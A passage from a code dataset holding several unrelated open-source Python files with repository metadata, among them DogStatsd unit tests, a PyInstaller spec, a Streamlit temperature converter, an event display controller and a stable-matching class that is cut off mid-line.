'env:prod2,type:app', [], ['env:prod', 'env:prod2', 'service:dog', 'type:app', 'version:abc123']),\n ('prod', 'dog', 'abc123', '', ['env:prod', 'type:app'], ['env:prod', 'env:prod', 'service:dog', 'type:app', 'version:abc123']),\n ('prod', 'dog', 'abc123', '', ['env:prod2', 'type:app'], ['env:prod', 'env:prod2', 'service:dog', 'type:app', 'version:abc123']),\n ('prod', 'dog', 'abc123', 'env:prod3,custom_tag:cat', ['env:prod2', 'type:app'], ['custom_tag:cat', 'env:prod', 'env:prod2', 'env:prod3', 'service:dog', 'type:app', 'version:abc123']),\n ]\n for case in cases:\n dd_env, dd_service, dd_version, datadog_tags, constant_tags, global_tags = case\n with EnvVars(\n env_vars={\n 'DATADOG_TAGS': datadog_tags,\n 'DD_ENV': dd_env,\n 'DD_SERVICE': dd_service,\n 'DD_VERSION': dd_version,\n }\n ):\n dogstatsd = DogStatsd(constant_tags=constant_tags, telemetry_min_flush_interval=0)\n dogstatsd.socket = FakeSocket()\n\n # Guarantee consistent ordering, regardless of insertion order.\n dogstatsd.constant_tags.sort()\n self.assertEqual(global_tags, dogstatsd.constant_tags)\n\n # Make call with no tags passed; only the globally configured tags will be used.\n global_tags_str = ','.join([t for t in global_tags])\n dogstatsd.gauge('gt', 123.4)\n dogstatsd.flush()\n\n # Protect against the no tags case.\n metric = 'gt:123.4|g|#{}\\n'.format(global_tags_str) if global_tags_str else 'gt:123.4|g\\n'\n self.assertEqual(metric, dogstatsd.socket.recv())\n self.assertEqual(\n telemetry_metrics(\n tags=global_tags_str,\n bytes_sent=len(metric)\n ),\n dogstatsd.socket.recv(),\n )\n dogstatsd._reset_telemetry()\n\n # Make another call with local tags passed.\n passed_tags = ['env:prod', 'version:def456', 'custom_tag:toad']\n all_tags_str = ','.join([t for t in passed_tags + global_tags])\n dogstatsd.gauge('gt', 123.4, tags=passed_tags)\n dogstatsd.flush()\n\n metric = 'gt:123.4|g|#{}\\n'.format(all_tags_str)\n self.assertEqual(metric, dogstatsd.socket.recv())\n self.assertEqual(\n telemetry_metrics(\n tags=global_tags_str,\n bytes_sent=len(metric),\n ),\n dogstatsd.socket.recv(),\n )\n\n def test_default_max_udp_packet_size(self):\n dogstatsd = DogStatsd(disable_buffering=False, flush_interval=10000, disable_telemetry=True)\n dogstatsd.socket = FakeSocket()\n\n for _ in range(10000):\n dogstatsd.increment('val')\n\n payload = dogstatsd.socket.recv()\n self.assertIsNotNone(payload)\n while payload is not None:\n payload_size = len(payload)\n self.assertLessEqual(payload_size, UDP_OPTIMAL_PAYLOAD_LENGTH)\n self.assertGreater(payload_size, UDP_OPTIMAL_PAYLOAD_LENGTH - 100)\n\n payload = dogstatsd.socket.recv()\n\n def test_default_max_uds_packet_size(self):\n dogstatsd = DogStatsd(\n disable_buffering=False,\n socket_path=\"fake\",\n flush_interval=10000,\n disable_telemetry=True,\n )\n dogstatsd.socket = FakeSocket()\n\n for _ in range(10000):\n dogstatsd.increment('val')\n\n payload = dogstatsd.socket.recv()\n self.assertIsNotNone(payload)\n while payload is not None:\n payload_size = len(payload)\n self.assertLessEqual(payload_size, UDS_OPTIMAL_PAYLOAD_LENGTH)\n self.assertGreater(payload_size, UDS_OPTIMAL_PAYLOAD_LENGTH - 100)\n\n payload = dogstatsd.socket.recv()\n\n def test_custom_max_packet_size(self):\n dogstatsd = DogStatsd(\n disable_buffering=False,\n max_buffer_len=4000,\n flush_interval=10000,\n disable_telemetry=True,\n )\n dogstatsd.socket = FakeSocket()\n\n for _ in range(10000):\n dogstatsd.increment('val')\n\n payload = dogstatsd.socket.recv()\n self.assertIsNotNone(payload)\n while payload is not None:\n payload_size = len(payload)\n self.assertLessEqual(payload_size, 4000)\n self.assertGreater(payload_size, 3900)\n\n payload = dogstatsd.socket.recv()\n\n def test_gauge_does_not_send_none(self):\n self.statsd.gauge('metric', None)\n self.assertIsNone(self.recv())\n\n def test_increment_does_not_send_none(self):\n self.statsd.increment('metric', None)\n self.assertIsNone(self.recv())\n\n def test_decrement_does_not_send_none(self):\n self.statsd.decrement('metric', None)\n self.assertIsNone(self.recv())\n\n def test_timing_does_not_send_none(self):\n self.statsd.timing('metric', None)\n self.assertIsNone(self.recv())\n\n def test_histogram_does_not_send_none(self):\n self.statsd.histogram('metric', None)\n self.assertIsNone(self.recv())\n\n def test_set_with_container_field(self):\n self.statsd._container_id = \"fake-container-id\"\n self.statsd.set(\"set\", 123)\n self.assert_equal_telemetry(\"set:123|s|c:fake-container-id\\n\", self.recv(2))\n self.statsd._container_id = None\n\n def test_gauge_with_container_field(self):\n self.statsd._container_id = \"fake-container-id\"\n self.statsd.gauge(\"gauge\", 123.4)\n self.assert_equal_telemetry(\"gauge:123.4|g|c:fake-container-id\\n\", self.recv(2))\n self.statsd._container_id = None\n\n def test_counter_with_container_field(self):\n self.statsd._container_id = \"fake-container-id\"\n\n self.statsd.increment(\"page.views\")\n self.statsd.flush()\n self.assert_equal_telemetry(\"page.views:1|c|c:fake-container-id\\n\", self.recv(2))\n\n self.statsd._reset_telemetry()\n self.statsd.increment(\"page.views\", 11)\n self.statsd.flush()\n self.assert_equal_telemetry(\"page.views:11|c|c:fake-container-id\\n\", self.recv(2))\n\n self.statsd._reset_telemetry()\n self.statsd.decrement(\"page.views\")\n self.statsd.flush()\n self.assert_equal_telemetry(\"page.views:-1|c|c:fake-container-id\\n\", self.recv(2))\n\n self.statsd._reset_telemetry()\n self.statsd.decrement(\"page.views\", 12)\n self.statsd.flush()\n self.assert_equal_telemetry(\"page.views:-12|c|c:fake-container-id\\n\", self.recv(2))\n\n self.statsd._container_id = None\n\n def test_histogram_with_container_field(self):\n self.statsd._container_id = \"fake-container-id\"\n self.statsd.histogram(\"histo\", 123.4)\n self.assert_equal_telemetry(\"histo:123.4|h|c:fake-container-id\\n\", self.recv(2))\n self.statsd._container_id = None\n\n def test_timing_with_container_field(self):\n self.statsd._container_id = \"fake-container-id\"\n self.statsd.timing(\"t\", 123)\n self.assert_equal_telemetry(\"t:123|ms|c:fake-container-id\\n\", self.recv(2))\n self.statsd._container_id = None\n\n def test_event_with_container_field(self):\n self.statsd._container_id = \"fake-container-id\"\n self.statsd.event(\n \"Title\",\n \"L1\\nL2\",\n priority=\"low\",\n date_happened=1375296969,\n )\n event2 = u\"_e{5,6}:Title|L1\\\\nL2|d:1375296969|p:low|c:fake-container-id\\n\"\n self.assert_equal_telemetry(\n event2,\n self.recv(2),\n telemetry=telemetry_metrics(\n metrics=0,\n events=1,\n bytes_sent=len(event2),\n ),\n )\n\n self.statsd._reset_telemetry()\n\n self.statsd.event(\"Title\", u\"♬ †øU †øU ¥ºu T0µ ♪\", aggregation_key=\"key\", tags=[\"t1\", \"t2:v2\"])\n event3 = u\"_e{5,32}:Title|♬ †øU †øU ¥ºu T0µ ♪|k:key|#t1,t2:v2|c:fake-container-id\\n\"\n self.assert_equal_telemetry(\n event3,\n self.recv(2, reset_wait=True),\n telemetry=telemetry_metrics(\n metrics=0,\n events=1,\n bytes_sent=len(event3),\n ),\n )\n self.statsd._container_id = None\n\n def test_service_check_with_container_field(self):\n self.statsd._container_id = \"fake-container-id\"\n now = int(time.time())\n self.statsd.service_check(\n \"my_check.name\",\n self.statsd.WARNING,\n tags=[\"key1:val1\", \"key2:val2\"],\n timestamp=now,\n hostname=u\"i-abcd1234\",\n message=u\"♬ †øU \\n†øU ¥ºu|m: T0µ ♪\",\n )\n check = u'_sc|my_check.name|{0}|d:{1}|h:i-abcd1234|#key1:val1,key2:val2|m:{2}|c:fake-container-id\\n'.format(\n self.statsd.WARNING, now, u'♬ †øU \\\\n†øU ¥ºu|m\\\\: T0µ ♪'\n )\n self.assert_equal_telemetry(\n check,\n self.recv(2),\n telemetry=telemetry_metrics(\n metrics=0,\n service_checks=1,\n bytes_sent=len(check),\n ),\n )\n self.statsd._container_id = None\n\n def test_sender_mode(self):\n statsd = DogStatsd(disable_background_sender=True)\n self.assertIsNone(statsd._queue)\n\n statsd.enable_background_sender()\n self.assertIsNotNone(statsd._queue)\n\n statsd = DogStatsd(disable_background_sender=False)\n self.assertIsNotNone(statsd._queue)\n\n def test_sender_calls_task_done(self):\n statsd = DogStatsd(disable_background_sender=False)\n statsd.socket = OverflownSocket()\n statsd.increment(\"test.metric\")\n statsd.wait_for_pending()\n\n def test_sender_queue_no_timeout(self):\n statsd = DogStatsd(disable_background_sender=False, sender_queue_timeout=None)\n\n def test_set_socket_timeout(self):\n statsd = DogStatsd(disable_background_sender=False)\n statsd.socket = FakeSocket()\n statsd.set_socket_timeout(1)\n self.assertEqual(statsd.socket.timeout, 1)\n self.assertEqual(statsd.socket_timeout, 1)\n","repo_name":"DataDog/datadogpy","sub_path":"tests/unit/dogstatsd/test_statsd.py","file_name":"test_statsd.py","file_ext":"py","file_size_in_byte":71712,"program_lang":"python","lang":"en","doc_type":"code","stars":582,"dataset":"github-code","pt":"31"} +{"seq_id":"7708596501","text":"# -*- mode: python ; coding: utf-8 -*-\n\nblock_cipher = None\n\n\na = Analysis(['order_creator_service.py'],\n pathex=['D:\\\\Projects\\\\Pro_py\\\\excel_order_creator'],\n binaries=[],\n datas=[\n (r'app\\static', r'app\\static'),\n (r'app\\templates', r'app\\templates'),\n (r'config.json', r'config.json'),\n (r'settings_produce.json', r'settings_produce.json'),\n (r'settings_sell.json', r'settings_sell.json'),\n (r'data.sqlite', r'data.sqlite')\n\t\t\t ],\n hiddenimports=[],\n hookspath=[],\n runtime_hooks=[],\n excludes=[],\n win_no_prefer_redirects=False,\n win_private_assemblies=False,\n cipher=block_cipher,\n noarchive=False)\npyz = PYZ(a.pure, a.zipped_data,\n cipher=block_cipher)\nexe = EXE(pyz,\n a.scripts,\n a.binaries,\n a.zipfiles,\n a.datas,\n [],\n name='order_creator_service',\n debug=False,\n bootloader_ignore_signals=False,\n strip=False,\n upx=True,\n upx_exclude=[],\n runtime_tmpdir=None,\n console=True )\n","repo_name":"troubtimehero/excel_order_creator","sub_path":"excel_order_creator/order_creator_service.spec","file_name":"order_creator_service.spec","file_ext":"spec","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70142184732","text":"import math\n\n\nclass GoalDetection:\n def __init__(self, distance_threshold=150):\n self.distance_threshold = distance_threshold\n self.flag = False\n self.count = 0\n\n def check_goal(self, goal_position, ball_position):\n if self.flag:\n return self.flag\n\n (x, y, w, h) = ball_position\n center_ball = int(x + w / 2), int(y + h / 2)\n\n (x, y, w, h) = goal_position\n center_goal = int(x + w / 2), int(y + h / 2)\n\n distance = math.hypot(center_ball[0] - center_goal[0], center_ball[1] - center_goal[1])\n if distance < self.distance_threshold:\n self.count += 1\n if self.count > 6:\n self.flag = True\n\n return self.flag\n","repo_name":"mosobhyy/Vision-Stats","sub_path":"goal_detection.py","file_name":"goal_detection.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"19354429729","text":"import streamlit as st\nfrom custom_module.custom import *\n\n\ndef ctokelvin():\n st.header(\"KONVERSI SUHU KELVIN\")\n\n st.subheader(\"Celcius Ke Kelvin\")\n\n c = st.number_input(\"Masukkan Suhu (C) :\")\n\n btn_luas = btnhasil(1)\n\n if btn_luas:\n result_luas = c + 273\n\n rumussuhu(\"Suhu\", \"Ke Kelvin\", \"C + 273\")\n\n resultsuhu(f\"Suhu\", \"Ke Kelvin\", result_luas)\n\n\ndef kelvintoc():\n st.subheader(\"Kelvin ke Celcius\")\n\n k = st.number_input(\"Masukkan Suhu (K) : \")\n\n btn_keliling = btnhasil(2)\n\n if btn_keliling:\n\n result_keliling = k - 273\n\n rumussuhu(\"Suhu\", \"Ke Celcius\", \"K - 273\")\n\n resultsuhu(\"Suhu\", \"Ke Celcius\", result_keliling)\n\n\ndef kelvin():\n import streamlit as st\n ctokelvin()\n kelvintoc()","repo_name":"tugasbesardaspro/tubesdaspro","sub_path":"components/suhu/kelvin.py","file_name":"kelvin.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6333662085","text":"import os\nimport numpy as np\nfrom PIL import Image\n\ndirname = \"./Data\"\ndirlist = os.listdir(dirname)\nfor index, file in enumerate(dirlist):\n bios = 0\n file_path = os.path.join(dirname, file)\n img = Image.open(file_path).convert(\"L\")\n imageArray = np.array(img) / 255.\n firstNum = imageArray[0][0]\n for row in imageArray:\n for col in row:\n bios = bios + abs(col - firstNum)\n \n if(bios < 20000):\n print(\"NO ---- process {} out of {}\".format(index, len(dirlist)))\n os.remove(file_path)\n else:\n print(\"YES ---- process {} out of {}\".format(index, len(dirlist)))\n \n\n","repo_name":"fish98/TuringDataGenerator","sub_path":"DataGenerate/dataCheck.py","file_name":"dataCheck.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28853075191","text":"import datetime\nimport dateutil.parser\nimport hashlib\nimport json\nimport os\nimport random\nimport time\nimport traceback\n\nfrom pretalx_api import PretalxAPI, ongoing_or_future_filter, max_duration_filter\n\nfrom PIL import Image\nfrom pprint import pprint\nfrom pyfis.aegmis import MIS1MatrixDisplay\nfrom pyfis.aegmis.exceptions import CommunicationError\n\nfrom _config import *\nfrom text_renderer import TextRenderer\nfrom gcm_controller import GCMController\n\n\nDISPLAY_MODES = [\n \"images\",\n \"hackertours\",\n \"pride\",\n \"pretalx\",\n]\n\nTRACK_CODES = {\n \"Sustainability & Climate Justice\": \"CS\",\n \"Hardware & Making\": \"HW\",\n \"Art & Beauty\": \"AB\",\n \"Ethics, Politics & Society\": \"EP\",\n \"CCC\": \"C\",\n \"Entertainment\": \"E\",\n \"Science\": \"S\",\n \"Security\": \"SE\"\n}\n\nROOM_ABBREVIATIONS = {\n \"Chaospat:innen Assembly Space\": \"Chaospatinnen\",\n \"Kidspace - Workshopraum in Saal B\": \"Kidspace Saal B\",\n \"Sendezentrum Podcast-Tisch\": \"Podcast-Tisch\"\n}\n\nTRACK_COLORS = {\n \"CS\": 0xfbc617,\n \"HW\": 0x9d9d9d,\n \"AB\": 0x81c854,\n \"EP\": 0x9d9d9d,\n \"C\": 0xfb48c4,\n \"E\": 0x1a36cd,\n \"S\": 0x9d9d9d,\n \"SE\": 0x3cacd7\n}\n\nGENERIC_PALETTE = [\n 0xff0000,\n 0x00ff00,\n 0x0000ff,\n 0xff0000,\n 0x00ffff,\n 0xff00ff,\n 0xffffff\n]\n\n\n# Pride flag image parser\ndef _flag_to_sectors(flag):\n # Takes the middle vertical column of pixels from the image\n # and converts it into a list of 32 colors\n if not isinstance(flag, Image.Image):\n flag = Image.open(flag)\n flag = flag.convert('RGB')\n pixels = flag.load()\n width, height = flag.size\n x = width // 2\n \n # Get colors and height per color\n colors = []\n current_color = pixels[x, 0]\n current_color_height = 0\n for y in range(height):\n color = pixels[x, y]\n current_color_height += 1\n if (color != current_color) or (y == height - 1):\n # Discard color artefacts that are too narrow\n if current_color_height / height > 0.05:\n hex_color = (current_color[0] << 16) | (current_color[1] << 8) | current_color[2]\n colors.append([hex_color, current_color_height])\n current_color = color\n current_color_height = 0\n \n # Limit to 32 colors max.\n colors = colors[:32]\n \n # Adapt heights to 32 sectors\n total_height = sum([color[1] for color in colors])\n for i, (color, height) in enumerate(colors):\n colors[i][1] = round(32 * height / total_height)\n \n # If new heights don't add up to 32, adapt last one\n if sum([color[1] for color in colors]) != 32:\n colors[-1][1] = 32 - sum([color[1] for color in colors[:-1]])\n \n # Turn color list into sector list of 32 colors\n sectors = []\n for color, height in colors:\n sectors.extend([color] * height)\n return sectors\n \n\n\ndef main():\n try:\n mode_index = 0\n mode = DISPLAY_MODES[mode_index]\n page = 1\n secondary_page = 2\n display_width = 3 * 96\n display_height = 64\n page_interval = 20 # Page switch interval in seconds (roughly)\n \n pretalx = PretalxAPI(\"https://fahrplan.events.ccc.de/congress/2023/fahrplan/schedule.json\")\n renderer = TextRenderer(\"../fonts\")\n display = MIS1MatrixDisplay(CONFIG_LCD_PORT, baudrate=115200, use_rts=False, debug=False)\n gcm = GCMController(CONFIG_GCM_PORT, debug=False)\n time.sleep(3)\n gcm.set_high_current(True)\n \n try:\n display.reset()\n except CommunicationError:\n pass\n time.sleep(1)\n display.set_config(\n lcd_module=0,\n num_lcds=3,\n x=0,\n y=0,\n id=1,\n board_timeout=600,\n fr_freq=0,\n fps=0,\n is_master=False,\n protocol_timeout=600,\n response_delay=0\n )\n display.become_master()\n \n last_page_update = 0\n hackertours_boarding = False\n hackertours_last_blink_update = 0\n hackertours_blink_state = False\n while True:\n utcnow = datetime.datetime.utcnow()\n now = datetime.datetime.now()\n \n # Handle all background calculations and data operations\n # Handle green alternating flashing on hackertours boarding\n if hackertours_boarding:\n now_time = time.time()\n if now_time - hackertours_last_blink_update >= 1.0:\n hackertours_blink_state = not hackertours_blink_state\n gcm.clear()\n if hackertours_blink_state:\n for i in range(10):\n gcm.set_sector(i, 0x000000)\n for i in range(10):\n gcm.set_sector(i+22, 0x00FF00)\n else:\n for i in range(10):\n gcm.set_sector(i, 0x00FF00)\n for i in range(10):\n gcm.set_sector(i+22, 0x000000)\n gcm.update()\n hackertours_last_blink_update = now_time\n \n if (time.time() - last_page_update) < page_interval:\n time.sleep(0.1)\n continue\n \n display.delete_page(secondary_page)\n gcm.clear()\n page, secondary_page = secondary_page, page\n print(\"Handling mode: \" + mode)\n \n # Handle displaying the required content\n hackertours_boarding = False\n if mode == \"hackertours\":\n # Load tours from file\n with open(\"/tmp/hackertours.txt\", 'r') as f:\n lines = f.readlines()\n \n tours = []\n for line in lines:\n timestamp = \" \".join(line.split()[:2])\n code = line.split()[2]\n destination = \" \".join(line.split()[3:])\n start = datetime.datetime.strptime(timestamp, \"%d.%m.%Y %H:%M\")\n if start >= now:\n tours.append({'start': start, 'code': code, 'destination': destination})\n \n for tour in tours:\n if now >= tour['start'] and now <= (tour['start'] + datetime.timedelta(minutes=15)):\n # This tour is boarding now\n display.fill_area(page, x=0, y=0, width=24, height=64, state=1)\n boarding_img = renderer.render_multiline_text(width=display_width-24, height=display_height, pad_left=0, pad_top=0, font=\"21_DBLCD\", size=0, halign='center', valign='middle', inverted=True, h_spacing=1, v_spacing=3, char_width=None, text=\"Now boarding:\\n\" + tour['destination'], auto_wrap=True, break_words=False)\n display.image(page, 24, 0, boarding_img)\n hackertours_boarding = True\n \n if not hackertours_boarding:\n header_image = renderer.render_text(width=256, height=12, pad_left=0, pad_top=0, font=\"12_DBLCD\", size=0, halign='left', valign='top', inverted=True, spacing=1, char_width=None, text=\"Hackertours\")\n display.image(page, 32, 0, header_image)\n display.fill_area(page, x=0, y=14, width=288, height=1, state=1)\n display.fill_area(page, x=0, y=0, width=24, height=14, state=1)\n gcm.set_sector(0, 0xFF0000)\n gcm.set_sector(1, 0xFF7F00)\n gcm.set_sector(2, 0xFFFF00)\n gcm.set_sector(3, 0x00FF00)\n gcm.set_sector(4, 0x0000FF)\n gcm.set_sector(5, 0x4B0082)\n gcm.set_sector(6, 0x8F00FF)\n \n if tours:\n items = sorted(tours, key=lambda t: t['start'])[:3]\n for i, tour in enumerate(items):\n dep_str = tour['start'].strftime(\"%a %H:%M\")\n y_base = (i + 1) * 16\n line = tour['code']\n # Crudely make lines have repeatable distinct colors\n color_index = sum(hashlib.md5(line.encode('utf8')).digest()) % len(GENERIC_PALETTE)\n for sector in range(8):\n gcm.set_sector(y_base // 2 + sector, GENERIC_PALETTE[color_index])\n line_image = renderer.render_text(width=24, height=16, pad_left=0, pad_top=0, font=\"12_DBLCD\", size=0, halign='center', valign='middle', inverted=False, spacing=1, char_width=None, text=line)\n display.image(page, 0, y_base, line_image)\n dest_image = renderer.render_text(width=152, height=16, pad_left=0, pad_top=0, font=\"12_DBLCD\", size=0, halign='left', valign='middle', inverted=True, spacing=1, char_width=None, text=tour['destination'])\n display.image(page, 32, y_base, dest_image)\n dep_image = renderer.render_text(width=96, height=16, pad_left=0, pad_top=0, font=\"12_DBLCD\", size=0, halign='right', valign='middle', inverted=True, spacing=1, char_width=None, text=dep_str)\n display.image(page, 192, y_base, dep_image)\n else:\n no_dep_img = renderer.render_text(width=display_width-24, height=48, pad_left=0, pad_top=0, font=\"12_DBLCD\", size=0, halign='center', valign='middle', inverted=True, spacing=2, char_width=None, text=\"No Hackertours :(\")\n display.image(page, 24, 16, no_dep_img)\n elif mode == \"pretalx\":\n # Display header\n track_image = renderer.render_text(width=28, height=7, pad_left=0, pad_top=0, font=\"7_DBLCD\", size=0, halign='left', valign='top', inverted=True, spacing=1, char_width=None, text=\"Trck\")\n location_image = renderer.render_text(width=70, height=7, pad_left=0, pad_top=0, font=\"7_DBLCD\", size=0, halign='left', valign='top', inverted=True, spacing=1, char_width=None, text=\"Location\")\n title_image = renderer.render_text(width=32, height=7, pad_left=0, pad_top=0, font=\"7_DBLCD\", size=0, halign='left', valign='top', inverted=True, spacing=1, char_width=None, text=\"Title\")\n time_image = renderer.render_text(width=50, height=7, pad_left=0, pad_top=0, font=\"7_DBLCD\", size=0, halign='right', valign='top', inverted=True, spacing=1, char_width=None, text=\"Starts in\")\n display.image(page, 0, 0, track_image)\n display.image(page, 26, 0, location_image)\n display.image(page, 96, 0, title_image)\n display.image(page, 238, 0, time_image)\n display.fill_area(page, x=0, y=8, width=288, height=1, state=1)\n for i in range(5):\n gcm.set_sector(i, 0xffffff)\n\n # Get schedule from pretalx\n events = pretalx.get_all_events()\n\n #tracks = list(set([event['track'] for event in events]))\n #pprint(tracks)\n \n # Filter out all events longer then 2 hours\n events = filter(lambda event: max_duration_filter(event, 2, 0), events)\n \n # Filter out all events that are finished\n events = filter(lambda event: ongoing_or_future_filter(event, max_ongoing=9), events)\n events = list(events)\n\n if events:\n for i, event in enumerate(events[:3]):\n start = dateutil.parser.isoparse(event['date']).replace(tzinfo=None)\n delta = start - now\n seconds = round(delta.total_seconds())\n if seconds < 0:\n time_text = \"{}m ago\".format(round(-seconds / 60))\n elif seconds >= 3600:\n time_text = \"{}h{}m\".format(seconds // 3600, round((seconds % 3600) / 60))\n else:\n time_text = \"{}m\".format(round((seconds % 3600) / 60))\n\n track_code = TRACK_CODES.get(event['track'], (event['track'] or \"/\").upper()[:2])\n track_color = TRACK_COLORS.get(track_code, 0xffffff)\n\n y_base = 12 + i * 16\n for r in range(8):\n gcm.set_sector(y_base // 2 + r, track_color)\n\n track_image = renderer.render_text(width=24, height=16, pad_left=0, pad_top=0, font=\"10S_DBLCD\", size=0, halign='center', valign='middle', inverted=False, spacing=1, char_width=None, text=track_code)\n room_image = renderer.render_text(width=68, height=16, pad_left=0, pad_top=3, font=\"7_DBLCD\", size=0, halign='left', valign='top', inverted=True, spacing=1, char_width=None, text=ROOM_ABBREVIATIONS.get(event['room'], event['room']))\n title_image = renderer.render_text(width=1000, height=16, pad_left=0, pad_top=0, font=\"10_DBLCD\", size=0, halign='left', valign='top', inverted=True, spacing=1, char_width=None, text=event['title'])\n time_image = renderer.render_text(width=50, height=16, pad_left=0, pad_top=0, font=\"10S_DBLCD\", size=0, halign='right', valign='top', inverted=True, spacing=1, char_width=None, text=time_text)\n \n room_bbox = room_image.getbbox()\n room_image = room_image.crop((0, 0, room_bbox[2], room_bbox[3]))\n title_bbox = title_image.getbbox()\n title_image = title_image.crop((0, 0, title_bbox[2], title_bbox[3]))\n \n display.image(page, 0, y_base, track_image)\n display.image(page, 26, y_base+1, room_image)\n if title_image.size[0] > 140:\n display.scroll_image(i*2+1, page, 96, y_base+3, 140, title_image, extra_whitespace=50)\n else:\n display.image(page, 96, y_base+3, title_image)\n display.image(page, 238, y_base+3, time_image)\n else:\n no_evt_img = renderer.render_text(width=display_width-24, height=48, pad_left=0, pad_top=0, font=\"12_DBLCD\", size=0, halign='center', valign='middle', inverted=True, spacing=2, char_width=None, text=\"No Events :(\")\n display.image(page, 24, 16, no_evt_img)\n elif mode == \"pride\":\n display.fill_area(page, x=0, y=0, width=24, height=64, state=1)\n flags = [file for file in os.listdir(\"../flags\") if not file.endswith(\"json\")]\n flag = random.choice(flags)\n flag_path = os.path.join(\"../flags\", flag)\n info_path = os.path.join(\"../flags\", os.path.splitext(flag)[0] + \".json\")\n print(\"Displaying flag:\", flag)\n sectors = _flag_to_sectors(flag_path)\n with open(info_path, 'r') as f:\n info = json.load(f)\n for i, color in enumerate(sectors):\n gcm.set_sector(i, color)\n name_image = renderer.render_text(width=256, height=24, pad_left=0, pad_top=0, font=\"14S_DBLCD\", size=0, halign='left', valign='middle', inverted=True, spacing=2, char_width=None, text=\"Pride Flags: \" + info['name'])\n display.image(page, 32, 0, name_image)\n #info_image = renderer.render_multiline_text(width=256, height=40, pad_left=0, pad_top=0, font=\"10S_DBLCD\", size=0, halign='left', valign='bottom', inverted=True, h_spacing=1, v_spacing=3, char_width=None, text=info['info'], auto_wrap=True, break_words=False)\n #display.image(page, 32, 24, info_image)\n elif mode == \"images\":\n images = [file for file in os.listdir(\"../images\")]\n image = random.choice(images)\n image_path = os.path.join(\"../images\", image)\n print(\"Displaying image:\", image)\n display.image(page, 24, 0, image_path)\n \n \n # Process any messages from the display and check for errors\n while True:\n response = display.send_tx_request()\n if response[0] == 0x15:\n break\n display.check_error(response)\n \n display.set_page(page)\n time.sleep(0.4) # LCD update delay\n gcm.update()\n if not hackertours_boarding:\n # HT boarding stays until the flag is reset, so prevent mode switching\n mode_index += 1\n if mode_index >= len(DISPLAY_MODES):\n mode_index = 0\n mode = DISPLAY_MODES[mode_index]\n last_page_update = time.time()\n except KeyboardInterrupt:\n raise\n except:\n try:\n display.port.close()\n except:\n pass\n try:\n gcm.port.close()\n except:\n pass\n raise\n\n\nif __name__ == \"__main__\":\n while True:\n try:\n main()\n except KeyboardInterrupt:\n break\n except:\n traceback.print_exc()\n print(\"Restarting in 10 seconds\")\n time.sleep(10)\n","repo_name":"Mezgrman/CCCamp23-RGB-LCD","sub_path":"python/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":17557,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"32756211395","text":"import unittest\n\nfrom svgis import projection\nfrom svgis.errors import SvgisError\nfrom svgis.utils import DEFAULT_GEOID\n\nSHP = 'tests/fixtures/cb_2014_us_nation_20m.json'\n\n\nclass ProjectionTestCase(unittest.TestCase):\n def testUtm(self):\n assert projection.utm_proj4(-21, 42) == '+proj=utm +zone=27 +north +datum=WGS84 +units=m +no_defs'\n\n assert projection.utm_proj4(-21, -42) == '+proj=utm +zone=27 +south +datum=WGS84 +units=m +no_defs'\n\n with self.assertRaises(SvgisError):\n projection.utm_proj4(-200, 100)\n\n def testLocalTm(self):\n fixture = (\n '+proj=lcc +lon_0=0 +lat_1=0 +lat_2=0 +lat_0=0 '\n '+x_0=0 +y_0=0 +ellps=GRS80 +towgs84=0,0,0,0,0,0,0 +units=m +no_defs'\n )\n self.assertEqual(projection.tm_proj4(0, 0, 0), fixture)\n\n def testGenerateCRS(self):\n bounds = -82.2, 40.1, -78.9, 45.8\n a = projection.generateproj4('utm', bounds=bounds, file_crs=DEFAULT_GEOID)\n self.assertEqual(a, '+proj=utm +zone=17 +north +datum=WGS84 +units=m +no_defs')\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"fitnr/svgis","sub_path":"tests/test_projection.py","file_name":"test_projection.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"32"} +{"seq_id":"265587166","text":"# Author : James Hope \n# Date : 13 April 2018 \n \nimport sys\nimport numpy as np\n\ndebug = False\n\n# Pool Class :: holds engagements\nclass Pool:\n def __init__(self, acceptors):\n \"\"\"\n Construct an array which will hold the engagements. Instatiate each maximum preference number that \n \"\"\"\n self.engagements = np.empty(shape=len(acceptors))\n self.engagements.fill(np.nan) \n\n def new_engagement(self,acceptor,proposer):\n \"\"\"\n Update (replace) the engagement in the pool \n \"\"\"\n if proposer in self.engagements:\n print(proposer, \"in position\", self.engagements.tolist().index(proposer)+1, \"set to NaN\")\n self.engagements[self.engagements.tolist().index(proposer)] = np.nan\n\n self.engagements[acceptor-1] = proposer\n \n def is_complete(self):\n \"\"\"\n Return True if complete\n \"\"\"\n if (np.isnan(self.engagements).any()):\n return False\n else:\n return True\n\n def get_current_engagement(self,acceptor): \n \"\"\"\n Return the current engagement for a acceptor\n \"\"\"\n return self.engagements[acceptor-1]\n\n def get_all_engagements(self):\n \"\"\"\n Return all the current engagements\n \"\"\" \n return self.engagements\n\n# Acceptor Class :: holds the acceptor preferences\nclass Acceptor:\n def __init__(self,values):\n \"\"\"\n Construct the acceptor preferences\n \"\"\"\n self.values = values\n\n def get_preference_number(self,acceptor,proposer):\n \"\"\"\n Return the preference of the acceptor for the proposer passed\n \"\"\"\n #print(self.values[acceptor-1])\n if proposer in self.values[acceptor-1]:\n return self.values[acceptor-1].index(proposer)+1\n else: \n return 0\n\n def is_proposal_accepted(self,acceptor,proposer):\n \"\"\"\n If proposer is in accepter preferences return true else return false\n \"\"\"\n if debug: (print(\"acceptor preference of proposal\", self.get_preference_number(acceptor,proposer)))\n if debug: (print(\"acceptor currently engaged to\", pool_object.get_current_engagement(acceptor)))\n if debug: (print(\"acceptor preference of current engagement\", self.get_preference_number(acceptor,pool_object.get_current_engagement(acceptor))))\n\n if (np.isnan(pool_object.get_current_engagement(acceptor)) and (self.get_preference_number(acceptor,proposer)!=0)):\n return True\n \n if (self.get_preference_number(acceptor,proposer) < 